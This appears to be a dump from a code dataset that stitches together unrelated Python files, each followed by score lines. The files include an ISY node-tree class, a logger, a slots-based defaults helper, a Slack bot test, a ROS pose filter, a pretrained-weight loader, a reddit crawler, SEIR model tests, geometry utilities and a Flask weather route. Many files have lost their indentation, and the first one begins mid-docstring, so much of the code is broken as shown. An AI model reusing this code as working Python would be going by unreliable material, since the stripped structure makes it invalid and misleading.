Used for navigating through the node tree. Can take names or IDs.
"""
try:
self.nids.index(val)
fun = self.getByID
except ValueError:
try:
self.nnames.index(val)
fun = self.getByName
except ValueError:
try:
val = int(val)
fun = self.getByInd
except ValueError:
fun = None
        if fun:
            output = None
            try:
                output = fun(val)
            except:
                pass
            if output:
                return output
        raise KeyError('Unrecognized Key: [' + str(val) + ']')
def __setitem__(self, val):
return None
def getByName(self, val):
"""
Gets child object with the given name.
| val: String representing name to look for.
"""
for i in range(len(self.nids)):
if self.nparents[i] == self.root and self.nnames[i] == val:
return self.getByInd(i)
def getByID(self, nid):
"""
Gets object with the given ID.
| nid: Integer representing node/group/folder id.
"""
i = self.nids.index(nid)
return self.getByInd(i)
def getByInd(self, i):
"""
Returns the object at the given index in the list.
| i: Integer representing index of node/group/folder.
"""
if self.ntypes[i] in ['group', 'node', 'property']:
return self.nobjs[i]
return Nodes(self.parent, self.nids[i], self.nids, self.nnames,
self.nparents, self.nobjs, self.ntypes)
def parseNotes(self, notes_xml):
spoken = None
if notes_xml is not None and notes_xml != "":
try:
notesdom = minidom.parseString(notes_xml)
except:
self.parent.log.error('ISY Could not parse node, notes '
+ 'poorly formatted XML: ' + notes_xml)
else:
spoken_tag = notesdom.getElementsByTagName('spoken')
if spoken_tag and len(spoken_tag) > 0 and spoken_tag[0].firstChild is not None:
spoken = spoken_tag[0].firstChild.toxml()
return { "spoken": spoken }
@property
def children(self):
out = []
for i in range(len(self.nids)):
if self.nparents[i] == self.root:
out.append((self.ntypes[i], self.nnames[i], self.nids[i]))
return out
@property
def hasChildren(self):
try:
self.nparents.index(self.root)
return True
except:
return False
@property
def name(self):
if self.root is None:
return ''
else:
ind = self.nids.index(self.root)
return self.nnames[ind]
@property
def allLowerNodes(self):
output = []
myname = self.name + '/'
for dtype, name, ident in self.children:
if dtype in ['group', 'node', 'property']:
output.append((dtype, myname + name, ident))
else:
output += [(dtype2, myname + name2, ident2)
for (dtype2, name2, ident2)
in self[ident].allLowerNodes]
return output
class NodeIterator(object):
""" Iterates through a list of nodes, returning node objects. """
def __init__(self, parent, iter_data, delta=1):
self._parent = parent
self._iterdata = iter_data
self._len = len(iter_data)
self._delta = delta
if delta > 0:
self._ind = 0
else:
self._ind = self._len - 1
def __next__(self):
if self._ind >= self._len or self._ind < 0:
raise StopIteration
_, path, ident = self._iterdata[self._ind]
self._ind += self._delta
return (path, self._parent[ident])
def __len__(self):
return self._len
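# Usage sketch (illustrative; assumes an already-initialized PyISY ISY instance
# whose `nodes` attribute is the Nodes tree defined above):
#
#     node = isy.nodes['Living Room Lamp']    # lookup by name, ID, or index
#     print(node.status)                      # current status value
#     for path, node in isy.nodes:            # iterate everything below the root
#         print(path, node)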
| 2.671875 | 3 |
easyCore/Utils/Logging.py | easyScience/easyCore | 2 | 6986 | <gh_stars>1-10
# SPDX-FileCopyrightText: 2021 easyCore contributors <<EMAIL>>
# SPDX-License-Identifier: BSD-3-Clause
# © 2021 Contributors to the easyCore project <https://github.com/easyScience/easyCore>
__author__ = 'github.com/wardsimon'
__version__ = '0.1.0'
import logging
class Logger:
def __init__(self, log_level: int = logging.INFO):
self.logger = logging.getLogger(__name__)
self.level = log_level
self.logger.setLevel(self.level)
def getLogger(self, logger_name, color: str = '32', defaults: bool = True) -> logging:
"""
Create a logger
:param color:
:param logger_name: logger name. Usually __name__ on creation
:param defaults: Do you want to associate any current file loggers with this logger
:return: A logger
"""
logger = logging.getLogger(logger_name)
logger.setLevel(self.level)
# self.applyLevel(logger)
# for handler_type in self._handlers:
# for handler in self._handlers[handler_type]:
# if handler_type == 'sys' or defaults:
# handler.formatter._fmt = self._makeColorText(color)
# logger.addHandler(handler)
# logger.propagate = False
# self._loggers.append(logger)
return logger
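# Usage sketch (illustrative):
#
#     logger = Logger().getLogger(__name__)
#     logger.info('easyCore logging initialised')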
| 2.359375 | 2 |
iqoptionapi/http/billing.py | mustx1/MYIQ | 3 | 6987 | """Module for IQ option billing resource."""
from iqoptionapi.http.resource import Resource
class Billing(Resource):
"""Class for IQ option billing resource."""
# pylint: disable=too-few-public-methods
url = "billing"
| 1.632813 | 2 |
defaultsob/core.py | honewatson/defaults | 0 | 6988 | # -*- coding: utf-8 -*-
def ordered_set(iter):
"""Creates an ordered set
@param iter: list or tuple
@return: list with unique values
"""
final = []
for i in iter:
if i not in final:
final.append(i)
return final
def class_slots(ob):
"""Get object attributes from child class attributes
@param ob: Defaults object
@type ob: Defaults
@return: Tuple of slots
"""
current_class = type(ob).__mro__[0]
if not getattr(current_class, 'allslots', None) \
and current_class != object:
_allslots = [list(getattr(cls, '__slots__', []))
for cls in type(ob).__mro__]
_fslots = []
for slot in _allslots:
_fslots = _fslots + slot
current_class.allslots = tuple(ordered_set(_fslots))
return current_class.allslots
def use_if_none_cls(alternative_attr):
def use_if_none(original_attr, ob, kwargs):
"""
Try and get a value from kwargs for original_attr. If there
is no original_attr in kwargs use the alternative_attr value
in the object ob
@param alternative_attr: the alternative attribute
@param original_attr: the original attribute
@param ob: the object with the attributes
@param kwargs: key values
@return: final value
"""
return kwargs.get(original_attr, getattr(ob, alternative_attr, None))
return use_if_none
def usef(attr):
"""Use another value as default
@param attr: the name of the attribute to
use as alternative value
@return: value of alternative attribute
"""
return use_if_none_cls(attr)
use_name_if_none = usef('Name')
def choose_alt(attr, ob, kwargs):
"""If the declared class attribute of ob is callable
then use that callable to get a default ob
instance value if a value is not available in kwargs.
@param attr: ob class attribute name
@param ob: the object instance whose default value needs to be set
@param kwargs: the kwargs values passed to the ob __init__ method
@return: value to be used to set ob instance
"""
result = ob.__class__.__dict__.get(attr, None)
if type(result).__name__ == "member_descriptor":
result = None
elif callable(result):
result = result(attr, ob, kwargs)
return result
class Defaults(object):
"""A base class which allows using slots to define
attributes and the ability to set object
instance defaults at the child class level"""
def __init__(self, **kwargs):
"""Assign kwargs to attributes and defaults to attributes"""
allslots = class_slots(self)
for attr in allslots:
setattr(self, attr, kwargs.get(
attr, choose_alt(attr, self, kwargs)))
def to_dict(self):
"""Returns attributes with values as dict
@return: dictionary of attributes with values
"""
allslots = class_slots(self)
return {
item: getattr(self, item, None)
for item in allslots
}
def to_dict_clean(self):
"""Return a dict where there values of None
are not included
@return: dict of the object properties with values
"""
attribs = self.to_dict()
return {
k: v
for k, v in attribs.items() if v
}
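

# Illustrative usage sketch; the classes below are hypothetical. Slots are
# declared on a base class and the default values on a subclass, so the
# class-attribute defaults do not collide with __slots__.
if __name__ == '__main__':
    class _ShapeBase(Defaults):
        __slots__ = ('Name', 'sides')

    class Triangle(_ShapeBase):
        sides = 3

    print(Triangle(Name='t1').to_dict())  # {'Name': 't1', 'sides': 3}
    print(Triangle().to_dict_clean())     # {'sides': 3}; None values dropped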
| 3.46875 | 3 |
tests/bot_test.py | item4/yui | 36 | 6989 | import asyncio
from collections import defaultdict
from datetime import timedelta
import pytest
from yui.api import SlackAPI
from yui.bot import Bot
from yui.box import Box
from yui.types.slack.response import APIResponse
from yui.utils import json
from .util import FakeImportLib
def test_bot_init(event_loop, monkeypatch, bot_config):
importlib = FakeImportLib()
monkeypatch.setattr('importlib.import_module', importlib.import_module)
bot_config.APPS = ['yui.app1', 'yui.app2']
box = Box()
bot = Bot(bot_config, event_loop, using_box=box)
assert bot.config == bot_config
assert bot.channels == []
assert bot.ims == []
assert bot.groups == []
assert bot.restart is False
assert isinstance(bot.api, SlackAPI)
assert bot.box is box
assert isinstance(bot.queue, asyncio.Queue)
assert importlib.import_queue == [
'yui.app1',
'yui.app2',
]
@pytest.mark.asyncio
async def test_call(event_loop, bot_config, response_mock):
token = 'asdf<PASSWORD>'
response_mock.post(
'https://slack.com/api/test11',
body=json.dumps({'res': 'hello world!'}),
headers={'content-type': 'application/json'},
status=200,
)
response_mock.post(
'https://slack.com/api/test12',
body=json.dumps({'res': 'hello world!', 'data': {'extra': 'wow'}}),
headers={'content-type': 'application/json'},
status=200,
)
response_mock.post(
'https://slack.com/api/test21',
body=json.dumps({'error': 'aaa'}),
headers={'content-type': 'application/json'},
status=404,
)
response_mock.post(
'https://slack.com/api/test22',
body=json.dumps({'error': 'aaa'}),
headers={'content-type': 'application/json'},
status=404,
)
response_mock.post(
'https://slack.com/api/test3',
body=json.dumps({'res': 'hello world!'}),
headers={'content-type': 'application/json'},
status=200,
)
box = Box()
bot = Bot(bot_config, event_loop, using_box=box)
bot.api.throttle_interval = defaultdict(lambda: timedelta(0))
res = await bot.call('test11')
assert res == APIResponse(
body={'res': 'hello world!'},
status=200,
headers={'content-type': 'application/json'},
)
res = await bot.call('test12', data={'extra': 'wow'})
assert res == APIResponse(
body={'res': 'hello world!', 'data': {'extra': 'wow'}},
status=200,
headers={'content-type': 'application/json'},
)
res = await bot.call('test21')
assert res == APIResponse(
body={'error': 'aaa'},
status=404,
headers={'content-type': 'application/json'},
)
res = await bot.call('test22', data={'extra': 'wow'})
assert res == APIResponse(
body={'error': 'aaa'},
status=404,
headers={'content-type': 'application/json'},
)
res = await bot.call('test3', token=token)
assert res == APIResponse(
body={'res': 'hello world!'},
status=200,
headers={'content-type': 'application/json'},
)
| 1.945313 | 2 |
scripts/marker_filter.py | CesMak/aruco_detector_ocv | 12 | 6990 | <reponame>CesMak/aruco_detector_ocv
#!/usr/bin/env python
import numpy as np
import rospy
import geometry_msgs.msg
import tf2_ros
from tf.transformations import quaternion_slerp
def translation_to_numpy(t):
return np.array([t.x, t.y, t.z])
def quaternion_to_numpy(q):
return np.array([q.x, q.y, q.z, q.w])
if __name__ == '__main__':
rospy.init_node('marker_filter')
alpha = rospy.get_param('~alpha', 0.9)
parent_frame_id = rospy.get_param('~parent_frame_id', 'kinect2_link')
marker_id = rospy.get_param('~marker_id', 'marker_id0')
marker_filtered_id = rospy.get_param(
'~marker_filtered_id', 'marker_id0_filtered')
rate_value = rospy.get_param('~rate_value', 125)
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
br = tf2_ros.TransformBroadcaster()
marker_pose = None
marker_pose0 = None
rate = rospy.Rate(rate_value)
while not rospy.is_shutdown():
marker_pose0 = marker_pose
# Lookup the transform
try:
marker_pose_new = tfBuffer.lookup_transform(
parent_frame_id, marker_id, rospy.Time())
if not marker_pose_new is None:
marker_pose = marker_pose_new
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as e:
rospy.logwarn(e)
if marker_pose is None:
rate.sleep()
continue
# Apply running average filter to translation and rotation
if not marker_pose0 is None:
rotation0 = quaternion_to_numpy(marker_pose0.transform.rotation)
rotation = quaternion_to_numpy(marker_pose.transform.rotation)
rotation_interpolated = quaternion_slerp(
rotation0, rotation, 1 - alpha)
translation0 = translation_to_numpy(
marker_pose0.transform.translation)
translation = translation_to_numpy(
marker_pose.transform.translation)
translation = alpha * translation0 + (1 - alpha) * translation
# Update pose of the marker
marker_pose.transform.rotation.x = rotation_interpolated[0]
marker_pose.transform.rotation.y = rotation_interpolated[1]
marker_pose.transform.rotation.z = rotation_interpolated[2]
marker_pose.transform.rotation.w = rotation_interpolated[3]
marker_pose.transform.translation.x = translation[0]
marker_pose.transform.translation.y = translation[1]
marker_pose.transform.translation.z = translation[2]
# Create new transform and broadcast it
t = geometry_msgs.msg.TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = parent_frame_id
t.child_frame_id = marker_filtered_id
t.transform = marker_pose.transform
br.sendTransform(t)
rate.sleep()
| 2.109375 | 2 |
src/backbone/utils.py | hankyul2/FaceDA | 20 | 6991 | <filename>src/backbone/utils.py
import os
import subprocess
from pathlib import Path
from torch.hub import load_state_dict_from_url
import numpy as np
model_urls = {
# ResNet
'resnet18': 'https://download.pytorch.org/models/resnet18-f37072fd.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-b627a593.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-0676ba61.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-63fe2227.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-394f9c45.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
# MobileNetV2
'mobilenet_v2': 'https://download.pytorch.org/models/mobilenet_v2-b0353104.pth',
# Se ResNet
'seresnet18': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/seresnet18-4bb0ce65.pth',
'seresnet34': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/seresnet34-a4004e63.pth',
'seresnet50': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-cadene/se_resnet50-ce0d4300.pth',
'seresnet101': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-cadene/se_resnet101-7e38fcc6.pth',
'seresnet152': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-cadene/se_resnet152-d17c99b7.pth',
'seresnext50_32x4d': 'http://data.lip6.fr/cadene/pretrainedmodels/se_resnext50_32x4d-a260b3a4.pth',
# ViT
'vit_base_patch16_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-B_16.npz',
'vit_base_patch32_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-B_32.npz',
'vit_large_patch16_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-L_16.npz',
'vit_large_patch32_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-L_32.npz',
# Hybrid (resnet50 + ViT)
'r50_vit_base_patch16_224': 'https://storage.googleapis.com/vit_models/imagenet21k/R50+ViT-B_16.npz',
'r50_vit_large_patch32_224': 'https://storage.googleapis.com/vit_models/imagenet21k/R50+ViT-L_32.npz',
}
def load_from_zoo(model, model_name, pretrained_path='pretrained/official'):
model_name = change_384_224(model_name)
Path(os.path.join(pretrained_path, model_name)).mkdir(parents=True, exist_ok=True)
if model_urls[model_name].endswith('pth'):
state_dict = load_state_dict_from_url(url=model_urls[model_name],
model_dir=os.path.join(pretrained_path, model_name),
progress=True, map_location='cpu')
state_dict.pop('fc.weight', None)
state_dict.pop('fc.bias', None)
state_dict.pop('classifier.weight', None)
state_dict.pop('classifier.bias', None)
model.load_state_dict(state_dict, strict=False)
elif model_urls[model_name].endswith('npz'):
npz = load_npz_from_url(url=model_urls[model_name],
file_name=os.path.join(pretrained_path, model_name, os.path.basename(model_urls[model_name])))
model.load_npz(npz)
def change_384_224(model_name):
model_name = model_name.replace('384', '224')
return model_name
def load_npz_from_url(url, file_name):
if not Path(file_name).exists():
subprocess.run(["wget", "-r", "-nc", '-O', file_name, url])
return np.load(file_name)
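

# Illustrative usage sketch; assumes torchvision is installed and that the
# checkpoint keys match torchvision's ResNet-18 (the URLs above are the
# official torchvision weights).
if __name__ == '__main__':
    from torchvision.models import resnet18

    model = resnet18(num_classes=10)   # classifier head differs from ImageNet
    load_from_zoo(model, 'resnet18')   # fc.weight / fc.bias are skipped
    print('loaded pretrained resnet18 backbone weights')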
| 2.21875 | 2 |
crawler1.py | pjha1994/Scrape_reddit | 0 | 6992 | import requests
from bs4 import BeautifulSoup
def recursiveUrl(url, link, depth):
if depth == 5:
return url
else:
print(link['href'])
page = requests.get(url + link['href'])
soup = BeautifulSoup(page.text, 'html.parser')
newlink = soup.find('a')
        if newlink is None:
return link
else:
return link, recursiveUrl(url, newlink, depth + 1)
def getLinks(url):
page = requests.get(url)
soup = BeautifulSoup(page.text, 'html.parser')
    links = soup.find_all('a')
    # Collect results in a separate list: appending to the list being
    # iterated over would never terminate.
    collected = []
    for link in links:
        collected.append(recursiveUrl(url, link, 0))
    return collected
links = getLinks("http://www.reddit.com/")
print(links) | 3.1875 | 3 |
chime2/tests/normal/models/seir_test.py | BrianThomasRoss/CHIME-2 | 0 | 6993 | """Tests for SEIR model in this repo
* Compares conserved quantities
* Compares the SEIR model without social policies against the SIR model in the limit where the two coincide
"""
from pandas import Series
from pandas.testing import assert_frame_equal, assert_series_equal
from bayes_chime.normal.models import SEIRModel, SIRModel
from pytest import fixture
from tests.normal.models.sir_test import ( # pylint: disable=W0611
fixture_penn_chime_raw_df_no_policy,
fixture_penn_chime_setup,
fixture_sir_data_wo_policy,
)
COLS_TO_COMPARE = [
"susceptible",
"infected",
"recovered",
# Does not compare census as this repo uses the exponential distribution
]
PENN_CHIME_COMMIT = "<PASSWORD>"
@fixture(name="seir_data")
def fixture_seir_data(sir_data_wo_policy):
"""Returns data for the SIHR model
"""
x, p = sir_data_wo_policy
pp = p.copy()
xx = x.copy()
pp["alpha"] = 0.5
pp["nu"] = 1
pp["initial_exposed"] = 0
return xx, pp
def test_conserved_n(seir_data):
"""Checks if S + E + I + R is conserved for SEIR
"""
x, pars = seir_data
n_total = 0
for key in SEIRModel.compartments:
n_total += pars[f"initial_{key}"]
seir_model = SEIRModel()
predictions = seir_model.propagate_uncertainties(x, pars)
n_computed = predictions[SEIRModel.compartments].sum(axis=1)
n_expected = Series(data=[n_total] * len(n_computed), index=n_computed.index)
assert_series_equal(n_expected, n_computed)
def test_compare_sir_vs_seir(sir_data_wo_policy, seir_data, monkeypatch):
"""Checks if SEIR and SIR return same results if the code enforces
* alpha = gamma
* E = 0
* dI = dE
"""
x_sir, pars_sir = sir_data_wo_policy
x_seir, pars_seir = seir_data
pars_seir["alpha"] = pars_sir["gamma"] # will be done by hand
def mocked_seir_step(data, **pars):
data["exposed"] = 0
new_data = SEIRModel.simulation_step(data, **pars)
new_data["infected"] += new_data["exposed_new"]
return new_data
seir_model = SEIRModel()
monkeypatch.setattr(seir_model, "simulation_step", mocked_seir_step)
sir_model = SIRModel()
predictions_sir = sir_model.propagate_uncertainties(x_sir, pars_sir)
predictions_seir = seir_model.propagate_uncertainties(x_seir, pars_seir)
assert_frame_equal(
predictions_sir[COLS_TO_COMPARE], predictions_seir[COLS_TO_COMPARE],
)
| 2.203125 | 2 |
Libraries/mattsLibraries/mathOperations.py | mrware91/PhilTransA-TRXS-Limits | 0 | 6994 | import numpy as np
from scipy.interpolate import interp1d
from pyTools import *
################################################################################
#~~~~~~~~~Log ops
################################################################################
def logPolyVal(p,x):
ord = p.order()
logs = []
    for idx in range(ord + 1):
logs.append( np.log( p[idx] ) + (ord-idx)*np.log(x) )
return logs
################################################################################
#~~~~~~~~~Symmeterize data
################################################################################
def symmeterize( x, y, interp_type='cubic' ):
if x.min() <= 0:
raise ValueError('x.min() must be greater than zero.')
xs = np.array([-x,x]).flatten()
xs.sort()
f = interp1d( x , y , kind=interp_type )
return { 'x':xs , 'y':f(np.abs(xs)) }
################################################################################
#~~~~~~~~~3D Shapes
################################################################################
def makeSphere(x0=0,y0=0,z0=0,r=1,ntheta=30,nphi=30):
u = np.linspace(0, np.pi, ntheta)
v = np.linspace(0, 2 * np.pi, nphi)
x = np.outer(np.sin(u), np.sin(v))*r
y = np.outer(np.sin(u), np.cos(v))*r
z = np.outer(np.cos(u), np.ones_like(v))*r
return x+x0, y+y0, z+z0
def makeCylinder(x0=0,y0=0,z0=0,r=1,h=10,ntheta=30,nz=30):
u = np.linspace(0, 2*np.pi, ntheta)
z = np.linspace(0, h, nz)
UU,ZZ = np.meshgrid(u,z)
XX = np.cos(UU)*r
YY = np.sin(UU)*r
# ax.plot_wireframe(x, y, z)
return XX+x0, YY+y0, ZZ+z0
def generateLine3D( x0=0, x1=1, y0=0, y1=1, z0=0, z1=0, N=2 ):
return {'line':{'xData':np.linspace(x0,x1,N),
'yData':np.linspace(y0,y1,N),
'zData':np.linspace(z0,z1,N),
'cData':np.ones((N,1))}}
################################################################################
#~~~~~~~~~2D Shapes
################################################################################
def generateCircle(R=1, X0=0, Y0=0, N = 60, thetaMin = 0, thetaMax = 2*np.pi ):
thetas = np.linspace( thetaMin , thetaMax , N)
uY = np.sin( thetas )*R
uX = np.cos( thetas )*R
return {'circle':{'xData':uX+X0, 'yData':uY+Y0}}
def generateEllipse( RX=2, RY=1, X0=0, Y0=0, N = 60, thetaMin = 0, thetaMax = 2*np.pi ):
thetas = np.linspace( thetaMin , thetaMax , N)
uY = np.sin( thetas )*RY
uX = np.cos( thetas )*RX
return {'ellipse':{'xData':uX+X0, 'yData':uY+Y0}}
def makeCylinder2D( L = 10., R = 1., N=60, view_degrees=30. ):
yFac = np.cos(view_degrees * np.pi/180.)
zFac = np.sin(view_degrees * np.pi/180.)
xL = np.ones((2,1))*-R
xR = -xL
y = np.array([0,L])*yFac
cylinder = { 'leftSide':{'xData':xL, 'yData':y},
'rightSide':{'xData':xR, 'yData':y},
'upperEllipse':generateEllipse(RX = R, RY=R*zFac, Y0=L*yFac,N=N)['ellipse'],
'lowerHalfEllipse':generateEllipse(RX = R, RY=R*zFac, thetaMin=np.pi, thetaMax=2*np.pi, N=int(N/2.))['ellipse']}
return cylinder
################################################################################
#~~~~~~~~~Rotations
################################################################################
def rotateObject(x,y,z,ax=None,ay=None,az=None):
if ax is not None:
y,z = rotateAt(y,z,ax)
if ay is not None:
x,z = rotateAt(x,z,-ay)
if az is not None:
x,y = rotateAt(x,y,az)
return x,y,z
def rotateAt(x,y,a):
xp = np.cos(a)*x-np.sin(a)*y
yp = np.cos(a)*y+np.sin(a)*x
return xp, yp
def rotateObj2D( obj_in, degrees ):
obj = obj_in.copy()
keys = obj.keys()
for key in keys:
obj[key] = rotate2D( degrees=degrees, **obj[key] )
return obj
def rotate2D( xData, yData, degrees ):
x = xData.flatten()
y = yData.flatten()
z = np.zeros_like(x)
x,y,z = rotateObject( x, y, z, az=float(degrees)/180.*np.pi )
return {'xData':x, 'yData':y}
def rotateObj3D( obj_in, gamma, theta, phi ):
obj = obj_in.copy()
keys = obj.keys()
for key in keys:
obj[key] = rotate3D( gamma=gamma, theta=theta, phi=phi, **obj[key] )
return obj
def rotate3D( xData, yData, zData, gamma, theta, phi, kwargs_toggle=True, **kwargs ):
ignore_kwargs(kwargs, toggle=kwargs_toggle)
x = xData.flatten()
y = yData.flatten()
z = zData.flatten()
x,y,z = rotateObject( x, y, z, az=float(gamma)/180.*np.pi )
x,y,z = rotateObject( x, y, z, ay=float(theta)/180.*np.pi )
x,y,z = rotateObject( x, y, z, az=float(phi)/180.*np.pi )
return {'xData':x, 'yData':y, 'zData':z}
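

# Illustrative usage sketch (assumes the module's own imports, including
# pyTools, resolve); the sample values below are made up.
if __name__ == '__main__':
    x = np.linspace(0.1, 1.0, 10)
    sym = symmeterize(x, x ** 2)                 # mirrors y(|x|) onto negative x
    circle = generateCircle(R=2.0, N=90)
    rotated = rotateObj2D(circle, degrees=45.0)  # rotation about the origin
    print(sym['x'].shape, rotated['circle']['xData'].shape)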
| 2.515625 | 3 |
setup.py | avryhof/ambient_api | 20 | 6995 | from setuptools import setup
setup(
name="ambient_api",
version="1.5.6",
packages=["ambient_api"],
url="https://github.com/avryhof/ambient_api",
license="MIT",
author="<NAME>",
author_email="<EMAIL>",
description="A Python class for accessing the Ambient Weather API.",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
],
install_requires=["requests", "urllib3"],
)
| 1.390625 | 1 |
tests/llvm/static/test_main_is_found/test_main_is_found.py | ganeshutah/FPChecker | 19 | 6996 | <reponame>ganeshutah/FPChecker
#!/usr/bin/env python
import subprocess
import os
def setup_module(module):
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
def teardown_module(module):
cmd = ["make clean"]
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def test_1():
cmd = ["make"]
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
passed = False
for l in cmdOutput.decode('utf-8').split("\n"):
if "#FPCHECKER: main() found" in l:
passed = True
assert passed == True
| 2.609375 | 3 |
regipy/exceptions.py | kamnon/regipy | 190 | 6997 | class RegipyException(Exception):
"""
This is the parent exception for all regipy exceptions
"""
pass
class RegipyGeneralException(RegipyException):
"""
General exception
"""
pass
class RegistryValueNotFoundException(RegipyException):
pass
class NoRegistrySubkeysException(RegipyException):
pass
class NoRegistryValuesException(RegipyException):
pass
class RegistryKeyNotFoundException(RegipyException):
pass
class UnidentifiedHiveException(RegipyException):
pass
class RegistryRecoveryException(RegipyException):
pass
class RegistryParsingException(RegipyException):
"""
Raised when there is a parsing error, most probably a corrupted hive
"""
pass
class NtSidDecodingException(RegipyException):
"""
Raised when the binary Windows NT SID representation can not be decoded
"""
| 2.140625 | 2 |
Dynamic_Programming/1259.Integer Replacement/Solution_BFS.py | Zhenye-Na/LxxxCode | 12 | 6998 | from collections import deque
class Solution:
"""
@param n: a positive integer
@return: the minimum number of replacements
"""
def integerReplacement(self, n):
# Write your code here
steps = 0
if n == 1:
return steps
queue = deque([n])
while queue:
size = len(queue)
print(queue, steps)
for _ in range(size):
num = queue.popleft()
if num == 1:
return steps
if num % 2 == 0:
queue.append(num // 2)
else:
queue.append(num + 1)
queue.append(num - 1)
steps += 1
return 0
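

# Illustrative usage sketch: 8 -> 4 -> 2 -> 1 takes 3 replacements, and
# 7 -> 8 -> 4 -> 2 -> 1 (or 7 -> 6 -> 3 -> 2 -> 1) takes 4.
if __name__ == '__main__':
    print(Solution().integerReplacement(8))  # -> 3
    print(Solution().integerReplacement(7))  # -> 4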
| 3.8125 | 4 |
src/routes/web.py | enflo/weather-flask | 0 | 6999 | <gh_stars>0
from flask import Blueprint, render_template
from gateways.models import getWeatherData
web = Blueprint("web", __name__, template_folder='templates')
@web.route("/", methods=['GET'])
def home():
items = getWeatherData.get_last_item()
cityName = items["city"]
return render_template("index.html",
city=cityName[0],
temperature=items["temperature"],
humidity=items["humidity"],
pressure=items["pressure"])
#@web.route("/profile", methods=['GET'])
#def profile():
# items = getWeatherData.get_last_item()
# return render_template("profile.html",
# celcius=items["temperature"],
# humidity=items["humidity"],
# pressure=items["pressure"])
#@web.route("/about", methods=['GET'])
#def about():
# return render_template("about.html")
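

# Illustrative registration sketch; the Flask app below is hypothetical and
# only shows how this blueprint would be mounted on an application.
if __name__ == '__main__':
    from flask import Flask

    app = Flask(__name__)
    app.register_blueprint(web)
    app.run(debug=True)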
| 2.484375 | 2 |